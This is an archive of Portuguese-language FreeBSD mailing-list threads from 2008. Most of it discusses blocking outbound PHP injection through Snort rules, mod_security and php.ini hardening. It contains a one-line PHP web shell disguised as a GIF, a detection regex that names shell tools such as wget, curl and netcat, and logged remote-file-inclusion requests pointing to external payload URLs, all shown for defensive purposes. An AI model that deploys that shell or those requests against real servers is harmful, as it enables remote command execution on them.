.jsp Ou AddType application/x-httpd-php .dhmtl Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso dificultara ao atacante qual a tecnologia que vc esta usando.. ele pensara que é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc deixar a variavel display_error=On, qdo der um erro.. o cara ja vai saber o que vc sta usando.. isso ajuda mas nao evita ataques contra programacao mal feita!! modsecurity do apache é muito bom... acho que todos deveriam ter... com bons filtros.. ajuda muuuito!! ate. Gustavo Polillo Correa. -- Original Message --- From: Marcelo M. Fleury [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Fri, 22 Feb 2008 09:59:32 -0300 Subject: Re: [FUG-BR] OT-Ataque PHP injection Olá, até onde eu entendi, o interesse da Cristina é em não ser uma provedora de códigos maliciosos, no caso PHP. Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques a rede/host, e sim de que a rede ou host seja uma provedora de ataques... na realidade não conheço solução voltada para isso... existe o mod_security do apache que pode te ajudar a monitorar e filtrar suas aplicações. Penso em algum programa que cheque a integridade de arquivos no servidor, algo parecido com o file: [EMAIL PROTECTED]:~$ cat sh.gif ?php system($_GET['sh']); ? [EMAIL PROTECTED]:~$ file sh.gif sh.gif: PHP script text e depois, habilitar alguns filtros no mod_security buscando checar qualquer uso indevido do php... confesso que não conheço muito o mod_security, uma vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar um tempo para brincar com ele). Acredito que no mais é realizar auditorias... procurar nos logs do apache por qualquer comando... estilo uname, id, ls ... nada que o cat,grep, awk não resolva! Espero ter ajudado, boa sorte! Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu: Oi Patrick, Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Como que funcionam essas regras que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance ? ou somente as regras que posso usar no snort. Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, não importa se é uma multinacional, pagara como pequeno. No site da SourceFire tem todos os detalhes sobre preços. São só as regras a principio, mas pode comprar o sistema deles. Não conheço quem use no país o sistema deles. Mas não parece ser mais do que o Snort com um front-end muito amigável. No caso da Juniper tem direito automaticamente a versão convertida pra Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS (que é um add-on no firewall Juniper). No Brasil quem representa a venda das assinaturas Source Fire é a BRConnection. Em 21/02/08, Patrick Tracanelli[EMAIL
[FUG-BR] Cluster Apache
Bom dia pessoal! To precisando montar um cluster de alta disponibilidade com balanceamento de carga de dois servidores rodando: Apache, PHP e MySQL-Server. Alguem pode me indicar algum tutorial? Cleyton. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Cluster Apache
qtos servidores de banco vc vai ter? vc quer ter alta disponibilidade do banco , com varios servidores Mysql ou fazer isso com o oapache com um unico banco? ou senao vc quer varios apaches com varios banco s Mysql em cluster? -- Original Message --- From: Cleyton Bertolim [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Fri, 22 Feb 2008 12:55:30 -0200 Subject: [FUG-BR] Cluster Apache Bom dia pessoal! To precisando montar um cluster de alta disponibilidade com balanceamento de carga de dois servidores rodando: Apache, PHP e MySQL-Server. Alguem pode me indicar algum tutorial? Cleyton. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd --- End of Original Message --- - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] OT-Ataque PHP injection
Bom dia Cristina! Só respondendo a William: ela quer evitar que os usuários da rede dela façam ataque de sql injection usando o servidor dela... O IDS como Patrick falou seria uma boa solução... Uma outra que pensei... um filtro web também não ajudaria? tipo: um bloqueio via squid ou dansguardian nas strings select, where, delete from... isso teria que ser bastante analisado para não gerar falsos alertas... mas é uma possibilidade. O que acham? Abraço, -- Welkson Renny de Medeiros Focus Automação Comercial Desenvolvimento / Gerência de Redes [EMAIL PROTECTED] Powered by (__) \\\'',) \/ \ ^ .\._/_) www.FreeBSD.org - Original Message - From: Cristina Fernandes Silva [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Friday, February 22, 2008 11:23 AM Subject: Re: [FUG-BR] OT-Ataque PHP injection Olha pessoal é como evitar prover ataques originados do meu servidor. Em 22/02/08, Gustavo Polillo Correa[EMAIL PROTECTED] escreveu: opa Marcelo.. bem colocado sua sugestao de footprint .. é preciso mudar o banner do apache e do SO tbm... :) -- Original Message --- From: Marcelo M. Fleury [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Fri, 22 Feb 2008 11:10:56 -0300 Subject: Re: [FUG-BR] OT-Ataque PHP injection Bom, a pergunta é sobre sofrer ataques ou prover ataques ? Seria bom esclarecer isso, a maioria das respostas é como evitar os ataques, mas eu entendi que ela quer garantir que em seu servidor não tenha códigos maliciosos, capazes de prover ataques em OUTROS servidores e não no dela... Gustavo, acrescentaria na sua lista o magic_quotes_gpc de qualquer formar, acredito que todas devem ser analisadas, buscando mensurar o impacto nos sistemas existentes... com relação a alterar a extensão do php, não sei até que ponto isso é valido... teria que se alterar o banner do apache também, dentre outras coisas( eu acho )... ataques de footprint são cada vez mais sofisticados... []s Em 22/02/08, Gustavo Polillo Correa [EMAIL PROTECTED] escreveu: no php.ini vc pode fazer : disable_functions = system,exec isso fara com que o php nao execute as funcoes system() e nem exec().. dando maior seguranca a ataques desse tipo.. outras variaveis interessantes para prover maior seguranca no php sao: safe_mode= On safe_mode_gid=Off expose_php=Off register_globals=Off (sem comentarios.. rsrs) dispaly_error=Off log_eroor=On error_log=php_erro.log Considerando que seu php nao emitira erros, vale ainda configurar o apache: trocar : AddType application/x-httpd-php .php Por: AddType application/x-httpd-php .jsp Ou AddType application/x-httpd-php .dhmtl Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso dificultara ao atacante qual a tecnologia que vc esta usando.. ele pensara que é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc deixar a variavel display_error=On, qdo der um erro.. o cara ja vai saber o que vc sta usando.. isso ajuda mas nao evita ataques contra programacao mal feita!! modsecurity do apache é muito bom... acho que todos deveriam ter... com bons filtros.. ajuda muuuito!! ate. Gustavo Polillo Correa. -- Original Message --- From: Marcelo M. Fleury [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Fri, 22 Feb 2008 09:59:32 -0300 Subject: Re: [FUG-BR] OT-Ataque PHP injection Olá, até onde eu entendi, o interesse da Cristina é em não ser uma provedora de códigos maliciosos, no caso PHP. Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques a rede/host, e sim de que a rede ou host seja uma provedora de ataques... na realidade não conheço solução voltada para isso... existe o mod_security do apache que pode te ajudar a monitorar e filtrar suas aplicações. Penso em algum programa que cheque a integridade de arquivos no servidor, algo parecido com o file: [EMAIL PROTECTED]:~$ cat sh.gif ?php system($_GET['sh']); ? [EMAIL PROTECTED]:~$ file sh.gif sh.gif: PHP script text e depois, habilitar alguns filtros no mod_security buscando checar qualquer uso indevido do php... confesso que não conheço muito o mod_security, uma vez que não trampo mais como sysadmin e sim como
Re: [FUG-BR] Cluster Apache
Aqui mesmo na lista.. olhe em artigos. http://www.fug.com.br/content/view/108/77/ http://www.fug.com.br/content/view/124/77/ http://www.fug.com.br/content/view/163/77/ 2008/2/22, Cleyton Bertolim [EMAIL PROTECTED]: Bom dia pessoal! To precisando montar um cluster de alta disponibilidade com balanceamento de carga de dois servidores rodando: Apache, PHP e MySQL-Server. Alguem pode me indicar algum tutorial? Cleyton. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] OT-Ataque PHP injection
Marcelo M. Fleury escreveu: Olá, até onde eu entendi, o interesse da Cristina é em não ser uma provedora de códigos maliciosos, no caso PHP. Então entendemos coisas distintas. Ao meu ver ela nao quer q usuarios internos façam ataque de injection em qualquer q seja o destino/alvo. Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques a rede/host, e sim de que a rede ou host seja uma provedora de ataques... E qual é a diferença? Sendo um IDS de rede, sua função é filtrar os 2 fluxos, o que sai e o que entra na/da rede. Ainda não entendi a relutancia hehe. na realidade não conheço solução voltada para isso... existe o mod_security A solução é o IPS/IDs hehe ;) O mod_security é fantastico, mas não se aplica, nem de longe, ao que ela quer. O mod_security é o mais indicado pra proteger exclusivamente o Apache local. É um DSO e como tal roda no mesmo nível do httpd. Portanto sequer, é capaz de identificar padrões iniciados da maquina com mod_security para outros destinos. Apenas quando o destino final é o Apache (serviço httpd). do apache que pode te ajudar a monitorar e filtrar suas aplicações. Penso em algum programa que cheque a integridade de arquivos no servidor, algo parecido com o file: [EMAIL PROTECTED]:~$ cat sh.gif ?php system($_GET['sh']); ? [EMAIL PROTECTED]:~$ file sh.gif sh.gif: PHP script text e depois, habilitar alguns filtros no mod_security buscando checar qualquer uso indevido do php... confesso que não conheço muito o mod_security, uma vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar um tempo para brincar com ele). Acredito que no mais é realizar auditorias... procurar nos logs do apache por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,awk não resolva! Eu discordo plenamente. Olhar logs é forense. Segurança tem que ser pro-ativa. E pelo que entendi na situação da Cristina ela não terá logs do Apache ou PHP pra olhar, ja que ela quer evitar que ataques sejam provenientes de seu ambiente, nao destinados a ele (ou pelo menos ambos os casos). Espero ter ajudado, boa sorte! Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu: Oi Patrick, Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Como que funcionam essas regras que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance ? ou somente as regras que posso usar no snort. Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, não importa se é uma multinacional, pagara como pequeno. No site da SourceFire tem todos os detalhes sobre preços. São só as regras a principio, mas pode comprar o sistema deles. Não conheço quem use no país o sistema deles. Mas não parece ser mais do que o Snort com um front-end muito amigável. No caso da Juniper tem direito automaticamente a versão convertida pra Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS (que é um add-on no firewall Juniper). No Brasil quem representa a venda das assinaturas Source Fire é a BRConnection. Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu: Cristina Fernandes Silva escreveu: Acho que não fui clara, Vou explicar, Quero evitar que alguem da minha rede use o meu ip (endereço ) para fazer ataques de php injection para outro endereço externo. Até mesmo os meus usuarios interno fazer algum ataque para servidores externos.. Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de satisfação vai depender da qualidade das regras de análise de instrusão que você utilizar. Isso quer dizer que dependendo do nível de seriedade da empresa será proveitoso assinar um serviço (comercial) que oferece regras testadas e atualizadas. Apesar da escolha natural ser Source Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela Juniper. São as mesmas utilizadas no Juniper série 5000, convertidas pro Snort. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico:
Re: [FUG-BR] OT-Ataque PHP injection
Welkson, Eu ia dizer a mesma coisa.. tentar usar o squidguard ou dansguardian, não se se resolveria.. ai é que os amigos para analise.. e possíveis regras.. Em 22/02/08, Welkson Renny de Medeiros[EMAIL PROTECTED] escreveu: Bom dia Cristina! Só respondendo a William: ela quer evitar que os usuários da rede dela façam ataque de sql injection usando o servidor dela... O IDS como Patrick falou seria uma boa solução... Uma outra que pensei... um filtro web também não ajudaria? tipo: um bloqueio via squid ou dansguardian nas strings select, where, delete from... isso teria que ser bastante analisado para não gerar falsos alertas... mas é uma possibilidade. O que acham? Abraço, -- Welkson Renny de Medeiros Focus Automação Comercial Desenvolvimento / Gerência de Redes [EMAIL PROTECTED] Powered by (__) \\\'',) \/ \ ^ .\._/_) www.FreeBSD.org - Original Message - From: Cristina Fernandes Silva [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Friday, February 22, 2008 11:23 AM Subject: Re: [FUG-BR] OT-Ataque PHP injection Olha pessoal é como evitar prover ataques originados do meu servidor. Em 22/02/08, Gustavo Polillo Correa[EMAIL PROTECTED] escreveu: opa Marcelo.. bem colocado sua sugestao de footprint .. é preciso mudar o banner do apache e do SO tbm... :) -- Original Message --- From: Marcelo M. Fleury [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Fri, 22 Feb 2008 11:10:56 -0300 Subject: Re: [FUG-BR] OT-Ataque PHP injection Bom, a pergunta é sobre sofrer ataques ou prover ataques ? Seria bom esclarecer isso, a maioria das respostas é como evitar os ataques, mas eu entendi que ela quer garantir que em seu servidor não tenha códigos maliciosos, capazes de prover ataques em OUTROS servidores e não no dela... Gustavo, acrescentaria na sua lista o magic_quotes_gpc de qualquer formar, acredito que todas devem ser analisadas, buscando mensurar o impacto nos sistemas existentes... com relação a alterar a extensão do php, não sei até que ponto isso é valido... teria que se alterar o banner do apache também, dentre outras coisas( eu acho )... ataques de footprint são cada vez mais sofisticados... []s Em 22/02/08, Gustavo Polillo Correa [EMAIL PROTECTED] escreveu: no php.ini vc pode fazer : disable_functions = system,exec isso fara com que o php nao execute as funcoes system() e nem exec().. dando maior seguranca a ataques desse tipo.. outras variaveis interessantes para prover maior seguranca no php sao: safe_mode= On safe_mode_gid=Off expose_php=Off register_globals=Off (sem comentarios.. rsrs) dispaly_error=Off log_eroor=On error_log=php_erro.log Considerando que seu php nao emitira erros, vale ainda configurar o apache: trocar : AddType application/x-httpd-php .php Por: AddType application/x-httpd-php .jsp Ou AddType application/x-httpd-php .dhmtl Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso dificultara ao atacante qual a tecnologia que vc esta usando.. ele pensara que é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc deixar a variavel display_error=On, qdo der um erro.. o cara ja vai saber o que vc sta usando.. isso ajuda mas nao evita ataques contra programacao mal feita!! modsecurity do apache é muito bom... acho que todos deveriam ter... com bons filtros.. ajuda muuuito!! ate. Gustavo Polillo Correa. -- Original Message --- From: Marcelo M. Fleury [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Fri, 22 Feb 2008 09:59:32 -0300 Subject: Re: [FUG-BR] OT-Ataque PHP injection Olá, até onde eu entendi, o interesse da Cristina é em não ser uma provedora de códigos maliciosos, no caso PHP. Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques a rede/host, e sim de que a rede ou host seja uma provedora de ataques... na realidade não conheço solução voltada para isso... existe o mod_security do apache que pode te ajudar a monitorar e filtrar suas aplicações.
Re: [FUG-BR] OT-Ataque PHP injection
William Grzybowski escreveu: Oi Patrick, Buenos =) Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Opa, confere hehehe Como que funcionam essas regras que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Cara, um IDS atua na camada 7, portanto de aplicação, seja qual aplicação for. Pense então numa regra ridiculamente simples, que alerte: - qualquer fluxo de qualquer origem pra qualquer destino em portas HTTP conhecidas (80, 8080, 3128, etc) - que cumpra os requisitos acima e contenha no payload um GET (protocolo HTTP) com qualquer uma das expressoes: - qqcoisa.php?qqcoisa=(http|ftp) - qqcoisa.php?qqcoisaqqcoisa=(http|ftp) So a regra simplista acima daria match em coisas como seila.php?ver=http://sei.na.net/seila2.php.txt seila.php?ver=produtoscategoria=ftp://u:[EMAIL PROTECTED]/seila.txt Ou seja ja eh indicio pleno de injection. Adicione na verificacao se houver na URL (a partedo payload apos o GET na porta http) qualquer coisa entre: (\\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|cat|pagina|path|include_location|root|page|gorumDir|site|topside|pun_root|open|seite)=(http|https|ftp)\\:/|(cmd|command)=(cd|\\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\\+\\+ |\\./|whoami|killall |rm \\-[a-z|A-Z])) Ai ja nem eh mais indicio, é descaramento. Por exemplo, meu IPS acaba de pegar, nesse segundo, a seguinte tentativa: GET http://www.freebsdbrasil.com.br/home.php?area=http://www.bestlearning.co.kr/bbs/tool25.txt?cmd=id; E 10 segundos antes: Req: http://free.bsd.com.br GET //admin_users.php?phpbb_root_path=http://www.artsconnect.com.au/art/can? HTTP/1.1 405 345 (null) - libwww-perl/5.805 [EMAIL PROTECTED] Qual é mais discarado? hhehehe se voce entrar em http://www.bestlearning.co.kr/bbs/tool25.txt?cmd=id Ta la o codigo que, supostamente, deveria ser injetado no php da vitima (eu). A questão é, esses logs são de fluxo inbound, o que chega no meu IPS e vai pra dentro, mas se o fluxo fosse outbound eu pegaria exatamente a mesma coisa, pq o que passa no PAYLOAD é a mesma coisa, e é o que o IDS/IPS analisa. Então se alguem aqui, ou um servidor de cliente no Data Center for comprometido (ou o proprio cliente resolver brincar) e tentar realizar os probing partindo daqui de dentro os alertas gerados serao equivalentes. Espero ter ajudado :) Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance ? ou somente as regras que posso usar no snort. Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, não importa se é uma multinacional, pagara como pequeno. No site da SourceFire tem todos os detalhes sobre preços. São só as regras a principio, mas pode comprar o sistema deles. Não conheço quem use no país o sistema deles. Mas não parece ser mais do que o Snort com um front-end muito amigável. No caso da Juniper tem direito automaticamente a versão convertida pra Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS (que é um add-on no firewall Juniper). No Brasil quem representa a venda das assinaturas Source Fire é a BRConnection. Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu: Cristina Fernandes Silva escreveu: Acho que não fui clara, Vou explicar, Quero evitar que alguem da minha rede use o meu ip (endereço ) para fazer ataques de php injection para outro endereço externo. Até mesmo os meus usuarios interno fazer algum ataque para servidores externos.. Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de satisfação vai depender da qualidade das regras de análise de instrusão que você utilizar. Isso quer dizer que dependendo do nível de seriedade da empresa será proveitoso assinar um serviço (comercial) que oferece regras testadas e atualizadas. Apesar da escolha natural ser Source Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela Juniper. São as mesmas utilizadas no Juniper série 5000, convertidas pro Snort. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico:
Re: [FUG-BR] OT-Ataque PHP injection
Patrick Tracanelli escreveu: Marcelo M. Fleury escreveu: Olá, até onde eu entendi, o interesse da Cristina é em não ser uma provedora de códigos maliciosos, no caso PHP. Então entendemos coisas distintas. Ao meu ver ela nao quer q usuarios internos façam ataque de injection em qualquer q seja o destino/alvo. Ou melhor, *não* façam. Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques a rede/host, e sim de que a rede ou host seja uma provedora de ataques... E qual é a diferença? Sendo um IDS de rede, sua função é filtrar os 2 fluxos, o que sai e o que entra na/da rede. Ainda não entendi a relutancia hehe. na realidade não conheço solução voltada para isso... existe o mod_security A solução é o IPS/IDs hehe ;) O mod_security é fantastico, mas não se aplica, nem de longe, ao que ela quer. O mod_security é o mais indicado pra proteger exclusivamente o Apache local. É um DSO e como tal roda no mesmo nível do httpd. Portanto sequer, é capaz de identificar padrões iniciados da maquina com mod_security para outros destinos. Apenas quando o destino final é o Apache (serviço httpd). do apache que pode te ajudar a monitorar e filtrar suas aplicações. Penso em algum programa que cheque a integridade de arquivos no servidor, algo parecido com o file: [EMAIL PROTECTED]:~$ cat sh.gif ?php system($_GET['sh']); ? [EMAIL PROTECTED]:~$ file sh.gif sh.gif: PHP script text e depois, habilitar alguns filtros no mod_security buscando checar qualquer uso indevido do php... confesso que não conheço muito o mod_security, uma vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar um tempo para brincar com ele). Acredito que no mais é realizar auditorias... procurar nos logs do apache por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,awk não resolva! Eu discordo plenamente. Olhar logs é forense. Segurança tem que ser pro-ativa. E pelo que entendi na situação da Cristina ela não terá logs do Apache ou PHP pra olhar, ja que ela quer evitar que ataques sejam provenientes de seu ambiente, nao destinados a ele (ou pelo menos ambos os casos). Espero ter ajudado, boa sorte! Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu: Oi Patrick, Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Como que funcionam essas regras que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance ? ou somente as regras que posso usar no snort. Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, não importa se é uma multinacional, pagara como pequeno. No site da SourceFire tem todos os detalhes sobre preços. São só as regras a principio, mas pode comprar o sistema deles. Não conheço quem use no país o sistema deles. Mas não parece ser mais do que o Snort com um front-end muito amigável. No caso da Juniper tem direito automaticamente a versão convertida pra Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS (que é um add-on no firewall Juniper). No Brasil quem representa a venda das assinaturas Source Fire é a BRConnection. Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu: Cristina Fernandes Silva escreveu: Acho que não fui clara, Vou explicar, Quero evitar que alguem da minha rede use o meu ip (endereço ) para fazer ataques de php injection para outro endereço externo. Até mesmo os meus usuarios interno fazer algum ataque para servidores externos.. Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de satisfação vai depender da qualidade das regras de análise de instrusão que você utilizar. Isso quer dizer que dependendo do nível de seriedade da empresa será proveitoso assinar um serviço (comercial) que oferece regras testadas e atualizadas. Apesar da escolha natural ser Source Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela Juniper. São as mesmas utilizadas no Juniper série 5000, convertidas pro Snort. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] FreeBSD 7.0RC3
Opa galera, saiu o RC3 do 7.0 ftp://ftp.freebsd.org/pub/FreeBSD/releases/i386/ISO-IMAGES/7.0/ ___ Yahoo! Mail - Sempre a melhor opção para você! Experimente já e veja as novidades. http://br.yahoo.com/mailbeta/tudonovo/ - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Geometry Error
Adquiri um Dell PowerEdge T105, com hd Western Digital modelo WD2500YS. Estou instalando o FreeBSD 6.3 Amd64 nele, e qdo vou fazer os slices para particionar, ele me dá uma mensagem de erro dizendo que a geometria do hd está errada. Jah procurei informações sobre o hd que tenho, mas nada resolve, ele não consegue escrever no disco. Testei com Debian, e funcionou sem problemas Alguém tem alguma dica de como posso solucionar isso? -- Danilo Bedani [EMAIL PROTECTED] - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Configuracao de DNS Reverso no TinyDNS
Pessoal, andei dando uma lida na configuracao do tinydns, na verdade, ele esta funcionando legal aqui, o problema nao estou conseguindo configurar o dns reverso para meu bloco, tenho um servidor de email nesses ips, entao preciso do dns reverso..alguem pode me dar um help? dei uma lida na documentacao, mas fiquei confuso! Meu bloco de Ip é 201.65.221.168/29, na verdade existia um arquivo aqui com final .in-addr.arpa, mas deu um problema aqui e perdi esse arquivo, e nao sei qual o conteudo dele!!! se alguem puder me ajudar!! Abaixo o meu config do tinydns: # ## GRUPO HERINGER # # Recebe autoridade no dominio grupoheringer.com.br .grupoheringer.com.br:201.65.221.171:a .grupoheringer.com.br:201.65.221.172:b .168-175.221.65.201.in-addr.arpa:201.65.221.171:a.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa:201.65.221.172:b.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa::ns.embratel.net.br ^171.168-175.221.65.201.in-addr.arpa:a.ns.grupoheringer.com.br ^172.168-175.221.65.201.in-addr.arpa:b.ns.grupoheringer.com.br ^170.221.65.201.in-addr.arpa:gateway.grupoheringer.com.br ^171.221.65.201.in-addr.arpa:servidor.grupoheringer.com.br ^172.221.65.201.in-addr.arpa:asterisk.grupoheringer.com.br # A, CNAME, Alias, PTR, MX =gateway.grupoheringer.com.br:201.65.221.170 =asterisk.grupoheringer.com.br:201.65.221.172 =a.ns.grupoheringer.com.br:201.65.221.171 =b.ns.grupoheringer.com.br:201.65.221.172 +grupoheringer.com.br:201.65.221.170 +www.grupoheringer.com.br:201.65.221.171 +mail.grupoheringer.com.br:201.65.221.172 +ftp.grupoheringer.com.br:201.65.221.171 +webmail.grupoheringer.com.br:201.65.221.172 +painel.grupoheringer.com.br:201.65.221.172 @grupoheringer.com.br::asterisk.grupoheringer.com.br:10 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] OT-Ataque PHP injection
Bom, Patrick, você está certo :), obrigado pelo post explicativo, tanto tempo sem mexer no snort ou em qualquer ids/ips, me fez confundir as bolas xD. []s Em 22/02/08, Patrick Tracanelli [EMAIL PROTECTED] escreveu: Patrick Tracanelli escreveu: Marcelo M. Fleury escreveu: Olá, até onde eu entendi, o interesse da Cristina é em não ser uma provedora de códigos maliciosos, no caso PHP. Então entendemos coisas distintas. Ao meu ver ela nao quer q usuarios internos façam ataque de injection em qualquer q seja o destino/alvo. Ou melhor, *não* façam. Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques a rede/host, e sim de que a rede ou host seja uma provedora de ataques... E qual é a diferença? Sendo um IDS de rede, sua função é filtrar os 2 fluxos, o que sai e o que entra na/da rede. Ainda não entendi a relutancia hehe. na realidade não conheço solução voltada para isso... existe o mod_security A solução é o IPS/IDs hehe ;) O mod_security é fantastico, mas não se aplica, nem de longe, ao que ela quer. O mod_security é o mais indicado pra proteger exclusivamente o Apache local. É um DSO e como tal roda no mesmo nível do httpd. Portanto sequer, é capaz de identificar padrões iniciados da maquina com mod_security para outros destinos. Apenas quando o destino final é o Apache (serviço httpd). do apache que pode te ajudar a monitorar e filtrar suas aplicações. Penso em algum programa que cheque a integridade de arquivos no servidor, algo parecido com o file: [EMAIL PROTECTED]:~$ cat sh.gif ?php system($_GET['sh']); ? [EMAIL PROTECTED]:~$ file sh.gif sh.gif: PHP script text e depois, habilitar alguns filtros no mod_security buscando checar qualquer uso indevido do php... confesso que não conheço muito o mod_security, uma vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar um tempo para brincar com ele). Acredito que no mais é realizar auditorias... procurar nos logs do apache por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,awk não resolva! Eu discordo plenamente. Olhar logs é forense. Segurança tem que ser pro-ativa. E pelo que entendi na situação da Cristina ela não terá logs do Apache ou PHP pra olhar, ja que ela quer evitar que ataques sejam provenientes de seu ambiente, nao destinados a ele (ou pelo menos ambos os casos). Espero ter ajudado, boa sorte! Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu: Oi Patrick, Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Como que funcionam essas regras 